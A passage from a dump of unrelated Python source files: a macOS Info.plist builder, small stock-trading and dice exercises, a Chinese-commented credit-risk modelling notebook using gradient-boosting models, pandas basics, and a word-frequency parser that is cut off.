executable_name = os.path.basename(
OutputDirectories.getResultFullpath(onefile=Options.isOnefileMode())
)
signed_app_name = Options.getMacOSSignedAppName() or app_name
app_version = Options.getMacOSAppVersion() or "1.0"
# TODO: We want an OrderedDict probably for stability.
infos = OrderedDict(
[
("CFBundleDisplayName", app_name),
("CFBundleName", app_name),
("CFBundleIdentifier", signed_app_name),
("CFBundleExecutable", executable_name),
("CFBundleInfoDictionaryVersion", "6.0"),
("CFBundlePackageType", "APPL"),
("CFBundleShortVersionString", app_version),
]
)
icon_paths = Options.getIconPaths()
if icon_paths:
assert len(icon_paths) == 1
icon_path = icon_paths[0]
# Convert to single macOS .icns file if necessary
if not icon_path.endswith(".icns"):
logger.info(
"File '%s' is not in macOS icon format, converting to it." % icon_path
)
icon_build_path = os.path.join(
OutputDirectories.getSourceDirectoryPath(onefile=onefile),
"icons",
)
makePath(icon_build_path)
converted_icon_path = os.path.join(
icon_build_path,
"Icons.icns",
)
convertImageToIconFormat(
logger=logger,
image_filename=icon_path,
converted_icon_filename=converted_icon_path,
)
icon_path = converted_icon_path
icon_name = os.path.basename(icon_path)
resources_dir = os.path.join(bundle_dir, "Resources")
makePath(resources_dir)
copyFile(icon_path, os.path.join(resources_dir, icon_name))
infos["CFBundleIconFile"] = icon_name
# Console mode, which is why we have to use bundle in the first place typically.
if Options.isMacOSBackgroundApp():
infos["LSBackgroundOnly"] = True
elif Options.isMacOSUiElementApp():
infos["LSUIElement"] = True
else:
infos["NSHighResolutionCapable"] = True
for resource_name, resource_desc in Options.getMacOSAppProtectedResourcesAccesses():
if resource_name in infos:
logger.sysexit("Duplicate value for '%s' is not allowed." % resource_name)
infos[resource_name] = resource_desc
filename = os.path.join(bundle_dir, "Info.plist")
if str is bytes:
plist_contents = plistlib.writePlistToString(infos)
else:
plist_contents = plistlib.dumps(infos)
with openTextFile(filename=filename, mode="wb") as plist_file:
plist_file.write(plist_contents)
|
993,516 | c7799b7af465e2b3d62b2aafc92f05b175a5df1f | #!/usr/bin/env python
'''
Beating the stock market
Given an array for which the ith element is price of given stock on day i.
If you were only permitted to buy one share of the stock and sell one share of the
stock, design an algorithm to find best times to buy and sell
'''
def bestBuySell(stock):
buy, sell, minPrice, maxDiff = [0] * 4
for i in range(len(stock)):
if stock[i] < stock[minPrice]:
minPrice = i
diff = stock[i] - stock[minPrice]
if diff > maxDiff:
maxDiff = diff
sell = i
buy = minPrice
return (buy, sell)
if __name__ == '__main__':
stock = [1, 3, 0, 8, 7, 6, 9]
buy, sell = bestBuySell(stock)
print 'Buy on {}. Sell on {}'.format(buy, sell)
|
993,517 | 83862050556dc6efcf0ed34d2fd54718b0888ce7 | from random import seed
from random import randint
seed()
stop = 1
while stop:
value = randint(1, 6)
print("Type 'r' to roll the dice")
print("Type 's' to stop")
rollAgain = input()
if rollAgain == "r":
print("DICE VALUE: "+ str(value) +"\n")
continue
else:
if rollAgain == "s":
exit() |
993,518 | dd5db504a3cab012dbff723862c7caa4f775d131 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# 忽略警告
import warnings
warnings.filterwarnings('ignore')
# 单个单元格多个输出
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = 'all'
import lightgbm as lgb
import xgboost as xgb
import catboost as cab
from sklearn.metrics import *
# In[2]:
#节约内存
def reduce_mem_usage(df):
""" iterate through all the columns of a dataframe and modify the data type
to reduce memory usage.
"""
start_mem = df.memory_usage().sum() / 1024 ** 2
print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))
for col in df.columns:
col_type = df[col].dtype
if col_type != object:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
else:
df[col] = df[col].astype('category')
end_mem = df.memory_usage().sum() / 1024 ** 2
print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))
print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))
return df
# In[3]:
# 读取数据
original_data = pd.read_csv('data_with_all_feature.csv')
original_data.head()
# In[4]:
# 缺失率统计
null_count_df = original_data.isnull().sum().to_frame()
null_count_df['var'] = null_count_df.index
null_count_df.reset_index(drop=True,inplace=True)
null_count_df.rename(columns={0:'null_counts'},inplace=True)
null_count_df['null_rates'] = null_count_df['null_counts'] / len(original_data)
null_count_df.head().append(null_count_df.tail())
# In[5]:
# 过滤掉覆盖率小于0.01的变量
# len(null_count_df[null_count_df['null_rates']>=0.99])
filter_var = null_count_df[null_count_df['null_rates']<=0.99]['var'].tolist()
# filter_var
filter_data = original_data[filter_var]
filter_data.drop(['mobile_md5','id_number_md5','name_md5','name','mobile'],axis=1,inplace=True)
filter_data.head()
# In[6]:
# 删除倾斜特征
# 目的:判断是否存在某个特征的某个值占比超过99%,一般会删除该特征
def value_counts_sta(df):
columns = df.columns.tolist()
lean_cols = []
for col in columns:
df_col = df[col].value_counts().to_frame()
df_col[col+'_true'] = df_col.index
df_col = df_col.reset_index(drop=True)
df_col.rename(columns={col:'counts'},inplace=True)
top1_value = df_col['counts'].head(1).tolist()[0]
if top1_value/(df_col['counts'].sum()) >= 0.99:
lean_cols.append(col)
return lean_cols
filter_data.drop(value_counts_sta(filter_data),axis=1,inplace=True)
filter_data.shape
# In[7]:
filter_data.info()
data_bin = filter_data.copy()
# In[8]:
# iv值过滤 大于0.03
from tqdm import tqdm
dic_bin = pd.DataFrame()
# 数值变量
num_cols = filter_data.select_dtypes(exclude=['category','object']).columns.tolist()
num_cols.remove('y_label')
for var in tqdm(num_cols):
s_col = [var] + ['y_label']
temp_df = data_bin[s_col]
temp_df[var] = pd.qcut(temp_df[var],5,duplicates='drop')
temp_df[var] = temp_df[var].replace(np.NaN,'missing')
bin_group = temp_df.groupby(var)['y_label'].agg([('bad_ratio','mean'),('count','count'),('bad_num','sum')]).reset_index()
bin_group['good_num'] = bin_group['count']-bin_group['bad_num']
target0_num=bin_group['good_num'].sum()
target1_num=bin_group['bad_num'].sum()
bin_group['good_perc']=(bin_group['good_num']+1)/(target0_num+1)
bin_group['bad_perc']=(bin_group['bad_num']+1)/(target1_num+1)
bin_group['woe'] = np.log((bin_group['bad_perc'])/(bin_group['good_perc']))
bin_group['iv'] = (bin_group['bad_perc']-bin_group['good_perc'])*bin_group['woe']
bin_group['total_iv']=bin_group['iv'].sum()
bin_group['var_name']=var
bin_group.columns=['bin','bad_ratio','count','bad_num','good_num','good_perc','bad_perc','woe','iv','total_iv','var_name']
# data_woe[var]=data_bin[var].map(dict(zip(bin_group.bin,bin_group.woe)))
dic_bin=pd.concat([dic_bin,bin_group])
dic_bin.to_csv('var_iv.csv',index=0,encoding='gbk')
# In[9]:
# 选择iv大于0.02 小于0.5的变量以及类别变量
iv_var = set(dic_bin[(dic_bin['total_iv']>=0.02) & (dic_bin['total_iv']<=0.5)]['var_name'])
select_var = filter_data.select_dtypes(include=['category','object']).columns.tolist() + list(iv_var) + ['y_label']
# 删除关联key信息
drop_list = [
'gaode_手机号/设备号',
'haoduoshu_name',
'haoduoshu_姓名',
'liandong_编号',
'liandong_加密手机号',
'liandong_加密ID',
'liandong_加密姓名',
'qianweidu_id',
'tenxun_phonenum_md5',
'tenxun_id_card_md5',
'tenxun_name',
'tenxun_general_tag']
filter_data = filter_data[select_var].drop(drop_list,axis=1)
filter_data.to_csv('filter_data.csv',index=0,encoding='gbk')
filter_data.head()
# # 数据分析EDA
# In[10]:
# 缺失率统计
null_count_df = filter_data.isnull().sum().to_frame()
null_count_df['var'] = null_count_df.index
null_count_df.reset_index(drop=True,inplace=True)
null_count_df.rename(columns={0:'null_counts'},inplace=True)
null_count_df['null_rates'] = null_count_df['null_counts'] / len(original_data)
null_count_df.to_csv('null_counts.csv',index=False,encoding='gbk')
# In[11]:
# 类别特征
cat_features = filter_data.select_dtypes(include=['object']).columns.tolist()
for col in cat_features:
print('类别特征的值个数:',(col,filter_data[col].nunique()))
# 数值特征
num_features = filter_data.select_dtypes(exclude=['object']).columns.tolist()
len(num_features)
# In[12]:
# 类别特征数据观察
# haoduoshu_手机可信等级 分布情况 做one hot编码
f, [ax1,ax2] = plt.subplots(2, 1, figsize=(15, 15))
sns.countplot(x = 'haoduoshu_手机可信等级' ,data = filter_data,ax = ax1)
sns.countplot(x = 'haoduoshu_手机可信等级', hue = 'y_label',hue_order = [0, 1],data = filter_data , ax = ax2)
# 其他为日期,单独一个日期date意义不大,建议删除,
# liandong_t_drcard_trans_tim_first liandong_t_drcard_trans_tim_curr日期做差 后者-前者
# liandong_t_crdt_trans_tim_first liandong_t_crdt_trans_tim_curr日期做差
# 身份证可以提取年龄,地区等信息
# In[13]:
# 数值特征数据观察 已经计算了iv值,筛选出的具有预测能力的变量不需要做更多关注。
# 观察变量与目标值的相关性
# filter_data[num_features].corr()
# # 特征工程
# In[14]:
# id_number 提取年龄,地区
filter_data['age'] = filter_data['id_number'].map(lambda x: 2020- int(str(x)[6:10]))
filter_data['cus_area'] = filter_data['id_number'].map(lambda x: str(x)[:6])
filter_data.drop(['id_number'],axis=1,inplace=True)
filter_data.shape
# In[15]:
# 日期特征,计算时间差
filter_data['liandong_t_drcard_trans_tim_used_days'] = (pd.to_datetime(filter_data['liandong_t_drcard_trans_tim_curr'],format='%Y-%m-%d', errors='coerce') -
pd.to_datetime(filter_data['liandong_t_drcard_trans_tim_first'], format='%Y-%m-%d', errors='coerce')).dt.days
filter_data['liandong_t_crdt_trans_tim_used_days'] = (pd.to_datetime(filter_data['liandong_t_crdt_trans_tim_curr'], format='%Y-%m-%d', errors='coerce') -
pd.to_datetime(filter_data['liandong_t_crdt_trans_tim_first'], format='%Y-%m-%d', errors='coerce')).dt.days
filter_data[['liandong_t_drcard_trans_tim_used_days','liandong_t_crdt_trans_tim_used_days']].head()
# filter_data.drop(['date','liandong_t_drcard_trans_tim_first',
# 'liandong_t_drcard_trans_tim_curr',
# 'liandong_t_crdt_trans_tim_first',
# 'liandong_t_crdt_trans_tim_curr'],axis=1,inplace=True)
filter_data.shape
# In[16]:
from sklearn.model_selection import StratifiedKFold,KFold
from itertools import product
class MeanEncoder:
def __init__(self, categorical_features, n_splits=10, target_type='classification', prior_weight_func=None):
"""
:param categorical_features: list of str, the name of the categorical columns to encode
:param n_splits: the number of splits used in mean encoding
:param target_type: str, 'regression' or 'classification'
:param prior_weight_func:
a function that takes in the number of observations, and outputs prior weight
when a dict is passed, the default exponential decay function will be used:
k: the number of observations needed for the posterior to be weighted equally as the prior
f: larger f --> smaller slope
"""
self.categorical_features = categorical_features
self.n_splits = n_splits
self.learned_stats = {}
if target_type == 'classification':
self.target_type = target_type
self.target_values = []
else:
self.target_type = 'regression'
self.target_values = None
if isinstance(prior_weight_func, dict):
self.prior_weight_func = eval('lambda x: 1 / (1 + np.exp((x - k) / f))', dict(prior_weight_func, np=np))
elif callable(prior_weight_func):
self.prior_weight_func = prior_weight_func
else:
self.prior_weight_func = lambda x: 1 / (1 + np.exp((x - 2) / 1))
@staticmethod
def mean_encode_subroutine(X_train, y_train, X_test, variable, target, prior_weight_func):
X_train = X_train[[variable]].copy()
X_test = X_test[[variable]].copy()
if target is not None:
nf_name = '{}_pred_{}'.format(variable, target)
X_train['pred_temp'] = (y_train == target).astype(int) # classification
else:
nf_name = '{}_pred'.format(variable)
X_train['pred_temp'] = y_train # regression
prior = X_train['pred_temp'].mean()
col_avg_y = X_train.groupby(by=variable, axis=0)['pred_temp'].agg({'mean': 'mean', 'beta': 'size'})
col_avg_y['beta'] = prior_weight_func(col_avg_y['beta'])
col_avg_y[nf_name] = col_avg_y['beta'] * prior + (1 - col_avg_y['beta']) * col_avg_y['mean']
col_avg_y.drop(['beta', 'mean'], axis=1, inplace=True)
nf_train = X_train.join(col_avg_y, on=variable)[nf_name].values
nf_test = X_test.join(col_avg_y, on=variable).fillna(prior, inplace=False)[nf_name].values
return nf_train, nf_test, prior, col_avg_y
def fit_transform(self, X, y):
"""
:param X: pandas DataFrame, n_samples * n_features
:param y: pandas Series or numpy array, n_samples
:return X_new: the transformed pandas DataFrame containing mean-encoded categorical features
"""
X_new = X.copy()
if self.target_type == 'classification':
skf = StratifiedKFold(self.n_splits)
else:
skf = KFold(self.n_splits)
if self.target_type == 'classification':
self.target_values = sorted(set(y))
self.learned_stats = {'{}_pred_{}'.format(variable, target): [] for variable, target in
product(self.categorical_features, self.target_values)}
for variable, target in product(self.categorical_features, self.target_values):
nf_name = '{}_pred_{}'.format(variable, target)
X_new.loc[:, nf_name] = np.nan
for large_ind, small_ind in skf.split(y, y):
nf_large, nf_small, prior, col_avg_y = MeanEncoder.mean_encode_subroutine(
X_new.iloc[large_ind], y.iloc[large_ind], X_new.iloc[small_ind], variable, target, self.prior_weight_func)
X_new.iloc[small_ind, -1] = nf_small
self.learned_stats[nf_name].append((prior, col_avg_y))
else:
self.learned_stats = {'{}_pred'.format(variable): [] for variable in self.categorical_features}
for variable in self.categorical_features:
nf_name = '{}_pred'.format(variable)
X_new.loc[:, nf_name] = np.nan
for large_ind, small_ind in skf.split(y, y):
nf_large, nf_small, prior, col_avg_y = MeanEncoder.mean_encode_subroutine(
X_new.iloc[large_ind], y.iloc[large_ind], X_new.iloc[small_ind], variable, None, self.prior_weight_func)
X_new.iloc[small_ind, -1] = nf_small
self.learned_stats[nf_name].append((prior, col_avg_y))
return X_new
def transform(self, X):
"""
:param X: pandas DataFrame, n_samples * n_features
:return X_new: the transformed pandas DataFrame containing mean-encoded categorical features
"""
X_new = X.copy()
if self.target_type == 'classification':
for variable, target in product(self.categorical_features, self.target_values):
nf_name = '{}_pred_{}'.format(variable, target)
X_new[nf_name] = 0
for prior, col_avg_y in self.learned_stats[nf_name]:
X_new[nf_name] += X_new[[variable]].join(col_avg_y, on=variable).fillna(prior, inplace=False)[
nf_name]
X_new[nf_name] /= self.n_splits
else:
for variable in self.categorical_features:
nf_name = '{}_pred'.format(variable)
X_new[nf_name] = 0
for prior, col_avg_y in self.learned_stats[nf_name]:
X_new[nf_name] += X_new[[variable]].join(col_avg_y, on=variable).fillna(prior, inplace=False)[
nf_name]
X_new[nf_name] /= self.n_splits
return X_new
# In[17]:
# 高基类别特征做平均数编码
MeanEnocodeFeature = ['cus_area','date','liandong_t_drcard_trans_tim_first',
'liandong_t_drcard_trans_tim_curr',
'liandong_t_crdt_trans_tim_first',
'liandong_t_crdt_trans_tim_curr'] #声明需要平均数编码的特征
ME = MeanEncoder(MeanEnocodeFeature,target_type='classification') #声明平均数编码的类
X_data = filter_data.drop(['y_label'],axis=1)
Y_data = filter_data['y_label']
X_data = ME.fit_transform(X_data,Y_data) #对训练数据集的X和y进行拟合
#x_train_fav = ME.fit_transform(x_train,y_train_fav)#对训练数据集的X和y进行拟合
# filter_data['cus_area'].nunique() 3481
# X_data.drop(['cus_area'],axis=1,inplace=True)
X_data.shape
# In[18]:
# 中文表头转换
cnn_2_en_dic = {'haoduoshu_该手机号对应自然人在天猫上注册的ID个数':'haoduoshu_phone_tianmao_counts',
'tenxun_疑似信贷恶意行为':'tenxun_yisieyixindai',
'gaode_打分结果':'gaode_score',
'tenxun_疑似资料仿冒行为':'tenxun_fake_info',
'tenxun_疑似金融黑产相关':'tenxun_finance_black',
'haoduoshu_手机可信等级':'haoduoshu_shoujikexindengji'}
X_data.rename(columns=cnn_2_en_dic,inplace=True)
# In[19]:
# 年龄分箱
age_bins = [20,30,40,50,60]
X_data['age'] = pd.cut(X_data['age'],age_bins)
# In[20]:
# 将原始编码特征drop
drop_col = ['date',
'liandong_t_drcard_trans_tim_first',
'liandong_t_drcard_trans_tim_curr',
'liandong_t_crdt_trans_tim_first',
'liandong_t_crdt_trans_tim_curr',
'cus_area']
X_data.drop(drop_col,axis=1,inplace=True)
# In[22]:
# 数据one hot 编码
X_data = pd.get_dummies(X_data,columns=['haoduoshu_shoujikexindengji','age'])
X_data.info()
# In[23]:
# 数据缺失值填充,填充中位数 因为数据有偏移的情况
for col in X_data.columns:
X_data[col].fillna(X_data[col].median(),inplace=True)
# In[28]:
# 年龄one hot后的变量重命名
re_dict = {'age_(20, 30]':'age_20_30',
'age_(30, 40]':'age_30_40',
'age_(40, 50]':'age_40_50',
'age_(50, 60]':'age_50_60'}
X_data.rename(columns=re_dict,inplace=True)
# In[29]:
# 根据特征重要性排序挑选特征,使用null importance feature消除噪声
# 获取树模型的特征重要性
def get_feature_importances(data, shuffle, target, seed=None):
# 特征
train_features = [f for f in data if f not in [target]]
y = data[target].copy()
# 在造null importance时打乱
if shuffle:
# 为了打乱而不影响原始数据,采用了.copy().sample(frac=1.0)这种有点奇怪的做法
y = data[target].copy().sample(frac=1.0)
# 使用lgb的随机森林模式,据说会比sklearn的随机森林快点
dtrain = lgb.Dataset(data[train_features], y, free_raw_data=False, silent=True)
lgb_params = {
'objective': 'binary',
'boosting_type': 'rf',
'subsample': 0.623,
'colsample_bytree': 0.7,
'num_leaves': 30,
'max_depth': 5,
'seed': seed,
'bagging_freq': 1,
'n_jobs': 4
}
#训练
clf = lgb.train(params=lgb_params, train_set=dtrain, num_boost_round=200)
# Get feature importances
imp_df = pd.DataFrame()
imp_df["feature"] = list(train_features)
imp_df["importance_gain"] = clf.feature_importance(importance_type='gain')
imp_df["importance_split"] = clf.feature_importance(importance_type='split')
return imp_df
actual_imp = get_feature_importances(data=pd.concat([X_data,Y_data],axis=1),shuffle=False,target='y_label')
actual_imp.sort_values("importance_gain",ascending=False)
# In[31]:
# 计算null importance
null_imp_df = pd.DataFrame()
nb_runs = 10
import time
start = time.time()
dsp = ''
for i in range(nb_runs):
# 获取当前轮feature impotance
imp_df = get_feature_importances(data=pd.concat([X_data,Y_data],axis=1), shuffle=True, target='y_label')
imp_df['run'] = i + 1
# 加到合集上去
null_imp_df = pd.concat([null_imp_df, imp_df], axis=0)
# 擦除旧信息
for l in range(len(dsp)):
print('b', end='', flush=True)
# 显示当前轮信息
spent = (time.time() - start) / 60
dsp = 'Done with %4d of %4d (Spent %5.1f min)' % (i + 1, nb_runs, spent)
print(dsp, end='', flush=True)
# In[32]:
# 计算原始特征重要性和null importance method的特征重要性的得分
# score = log((1+actual_importance)/(1+null_importance_75))
feature_scores = []
for _f in actual_imp['feature'].unique():
f_null_imps_gain = null_imp_df.loc[null_imp_df['feature'] == _f, 'importance_gain'].values
f_act_imps_gain = actual_imp.loc[actual_imp['feature'] == _f, 'importance_gain'].mean()
gain_score = np.log(1e-10 + f_act_imps_gain / (1 + np.percentile(f_null_imps_gain, 75))) # Avoid didvide by zero
f_null_imps_split = null_imp_df.loc[null_imp_df['feature'] == _f, 'importance_split'].values
f_act_imps_split = actual_imp.loc[actual_imp['feature'] == _f, 'importance_split'].mean()
split_score = np.log(1e-10 + f_act_imps_split / (1 + np.percentile(f_null_imps_split, 75))) # Avoid didvide by zero
final_score = 0.4*split_score+0.6*gain_score
feature_scores.append((_f, split_score, gain_score,final_score))
scores_df = pd.DataFrame(feature_scores, columns=['feature', 'split_score', 'gain_score','final_score'])
null_importance_score = 'null_importance_score.xlsx'
scores_df.to_excel(null_importance_score,index=False)
# In[34]:
# 过滤
filter_var = scores_df[scores_df['final_score']>0.1].feature.tolist()
X_data = X_data[filter_var]
X_data.shape
# In[35]:
# 数据做归一化
from sklearn.preprocessing import MinMaxScaler
min_max_scaler = MinMaxScaler()
min_max_scaler.fit(X_data.values)
X_data = pd.DataFrame(min_max_scaler.transform(X_data.values),columns=X_data.columns)
# In[37]:
# 拆分数据集
from sklearn.model_selection import train_test_split
y = Y_data # target
X = X_data
# 80% 是 是线下数据
# 20% 是 是线上的数据
X_offset, X_onset, y_offset, y_onset = train_test_split(X, y ,test_size=0.2,random_state=2)
X_offset.shape,X_onset.shape
# # LR CV
# In[38]:
from sklearn.linear_model import LogisticRegression,ElasticNet
clf = LogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,
intercept_scaling=1, l1_ratio=None, max_iter=100,
multi_class='warn', n_jobs=None, penalty='l2',
random_state=None, solver='warn', tol=0.0001, verbose=0,
warm_start=False)
# 线上预测的结果集
onset_predictions = np.zeros(len(X_onset))
# 线下验证的结果集
offset_predictions = np.zeros(len(X_offset))
# 线下cv auc的均值
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}:'.format(fold+1))
trn_data = X_offset.iloc[train_idx]
val_data = X_offset.iloc[val_idx]
clf.fit(trn_data,y_offset.iloc[train_idx])
# 线下每折的结果集
offset_predictions[val_idx] = clf.predict_proba(val_data.values)[:,1]
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict_proba(X_onset.values)[:,1]/sk.n_splits
print('lr 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('lr 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('lr 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('lr 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
# # LGB CV
# In[39]:
from sklearn.model_selection import StratifiedKFold
params = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': 'auc',
'num_leaves': 30,
'max_depth': -1,
'min_data_in_leaf': 450,
'learning_rate': 0.01,
'feature_fraction': 0.9,
'bagging_fraction': 0.95,
'bagging_freq': 5,
'lambda_l1': 1,
'lambda_l2': 0.001,# 越小l2正则程度越高
'min_gain_to_split': 0.2,
#'device': 'gpu',
'is_unbalance': True
}
folds = StratifiedKFold(n_splits=5, shuffle=True, random_state=99999)
oof = np.zeros(len(X_offset))
predictions = np.zeros(len(X_onset))
mean_score=0
for fold_, (trn_idx, val_idx) in enumerate(folds.split(X_offset.values, y_offset.values)):
print("Fold {}".format(fold_))
trn_data = lgb.Dataset(X_offset.iloc[trn_idx], label=y_offset.iloc[trn_idx])
val_data = lgb.Dataset(X_offset.iloc[val_idx], label=y_offset.iloc[val_idx])
clf = lgb.train(params, trn_data, 100000, valid_sets = [trn_data, val_data], verbose_eval=100, early_stopping_rounds = 200)
oof[val_idx] = clf.predict(X_offset.iloc[val_idx], num_iteration=clf.best_iteration)
mean_score += roc_auc_score(y_offset.iloc[val_idx], oof[val_idx]) / folds.n_splits
predictions += clf.predict(X_onset, num_iteration=clf.best_iteration) / folds.n_splits
# 线下cv
print("CV score: {:<8.5f}".format(roc_auc_score(y_offset, oof)))
print("mean score: {:<8.5f}".format(mean_score))
# 线上得分
print("lgb online score: {:<8.5f}".format(roc_auc_score(y_onset, predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,predictions)
print('lgb 线上结果集 ks:{:<8.5f}'.format(max(tpr-fpr)))
# # XGB CV
# In[40]:
params={
'booster':'gbtree',
'objective ':'binary:logistic',
'gamma':0.1, # 在树的叶子节点下一个分区的最小损失,越大算法模型越保守 。[0:]
'max_depth':6, # 构建树的深度 [1:]
'subsample':0.8, # 采样训练数据,设置为0.5,随机选择一般的数据实例 (0:1]
'colsample_by_tree':0.8, # 构建树时的采样比率 (0:1]
'eta': 0.01, # 如同学习率
'seed':555, # 随机种子
'silent':1,
'eval_metric':'auc',
'n_job':-1,
# 'tree_method':'gpu_hist'
}
# 线上用于预测的矩阵
test_data = xgb.DMatrix(X_onset,label=y_onset)
# 线上预测的结果集
onset_predictions = np.zeros(len(X_onset))
# 线下验证的结果集
offset_predictions = np.zeros(len(X_offset))
# 线下cv auc的均值
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}:'.format(fold))
trn_data = xgb.DMatrix(X_offset.iloc[train_idx],label=y_offset.iloc[train_idx])
val_data = xgb.DMatrix(X_offset.iloc[val_idx],label=y_offset.iloc[val_idx])
clf = xgb.train(params=params,dtrain=trn_data,num_boost_round=10000,evals=[(trn_data,'train'),(val_data,'val')],
early_stopping_rounds=200,verbose_eval=100)
# 线下每折的结果集
offset_predictions[val_idx] = clf.predict(val_data,ntree_limit=clf.best_iteration)
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict(test_data,ntree_limit=clf.best_iteration)/sk.n_splits
print('xgb 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('xgb 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('xgb 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('xgb 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
# # CAB CV
# In[41]:
clf = cab.CatBoostClassifier(iterations=100000,
learning_rate=0.01,
depth=5, loss_function='Logloss',early_stopping_rounds = 100,eval_metric='AUC')
# 线下预测结果集
offset_predictions = np.zeros(len(X_offset))
# 线上预测结果集
onset_predictions = np.zeros(len(X_onset))
# 线下cv auc平均得分
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}'.format(fold+1))
train_data = X_offset.iloc[train_idx]
val_data = X_offset.iloc[val_idx]
clf.fit(train_data, y_offset.iloc[train_idx], eval_set=(val_data,y_offset.iloc[val_idx]),verbose= 50)
offset_predictions[val_idx] = clf.predict_proba(val_data)[:,1]
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict_proba(X_onset)[:,1]/sk.n_splits
print('cab 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('cab 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('cab 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('cab 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
|
993,519 | 7ed3f807ea0900931c8cefce84b8e2b0644fa737 | #!/usr/bin/env python
# coding: utf-8
# In[20]:
import pandas as pd
# In[21]:
p1=pd.Series({'r':67,'u':90})
# In[22]:
p1
# In[23]:
p1=pd.Series({'r':67,'u':90},index=['u','r'])
# In[24]:
p1
# In[25]:
p1=pd.Series({'r':67,'u':90},index=['a','b'])
# In[26]:
p1
# In[27]:
l1=[9,8,7,6,5,3]
# In[28]:
s2=pd.Series(l1)
# In[29]:
s2
# In[30]:
s2[3]
# In[31]:
s2[:5]
# In[32]:
s2[-3:]
# In[33]:
s2+5
# In[34]:
p3=pd.DataFrame({'name':['n','k','l'],'value':[9,8,7]})
# In[35]:
p3
# In[ ]:
# In[ ]:
# In[36]:
p3.head
# In[37]:
p3.describe()
# In[38]:
p3.tail()
# In[39]:
p3.tail()
# In[40]:
p3.head()
# In[41]:
import pandas as pd1
# In[42]:
l1=[2,3,4]
# In[43]:
pd1.Series(l1)
# In[ ]:
# In[ ]:
# In[ ]:
|
993,520 | 18c886c3f8603f2c19a8384d89f5b71f2c3eea3a | """
Ryan Pepper (2018)
fileparser.py
This file contains a parser function that processes a text file.
"""
import re
def _read(filename, encodings=['ascii', 'utf-8', 'utf-16', 'latin-1']):
"""
_read(filename)
Try to read files and return the text regardless of their encoding.
Raises UnicodeError on failure.
Input:
filename, str
File to be read
Output:
str:
Contents of the file
"""
text = None
for encoding in encodings:
try:
f = open(filename, encoding=encoding)
text = f.read()
f.close()
except UnicodeDecodeError:
f.close()
except UnicodeError:
f.close()
except FileNotFoundError:
raise FileNotFoundError("Could not open file.")
if not text:
raise UnicodeError(filename)
return text
def parse(filename, case_sensitive=False, sort=False):
"""
parse(filename, case_sensitive=False, sort=False)
Opens a file, and reads it line by line, returning a dictionary
containing key-value pairs of words and their frequency in the file.
Note: newline characters are *always* removed from the file.
Inputs:
filename, str:
The file to be calculate word frequencies.
case_sensitive, bool:
Whether processing should be case sensitive or not, i.e.
if 'the' is the same as 'The' for counting word frequencies.
sort, bool:
Setting True enables sorting dict by word frequency.
Outputs:
dict:
Dictionary containing key-value pairs of words and their
frequency in the file.
Examples:
>>> text = "The quick brown fox jumped over the lazy dog."
>>> f = open('example.txt', 'w')
>>> f.write(text)
>>> f.close()
>>> FolderAnalyse.fileparser.parse('example.txt', case_sensitive=False)
{'the': 2, 'quick': 1, 'brown': 1, 'fox': 1, 'jumped': 1,
'over: 1, 'the': 1, 'lazy': 1, 'dog.': 1}
>>> FolderAnalyse.fileparser.parse('example.txt', case_sensitive=False)
{'the': 2, 'quick': 1, 'brown': 1, 'fox': 1, 'jumped': 1,
'over: 1, 'the': 1, 'lazy': 1, 'dog.': 1}
"""
text = _read(filename)
# If case_sensitive is true we make the text all lower case.
if not case_sensitive:
text = text.lower()
# Note: we here process a word as being anything with
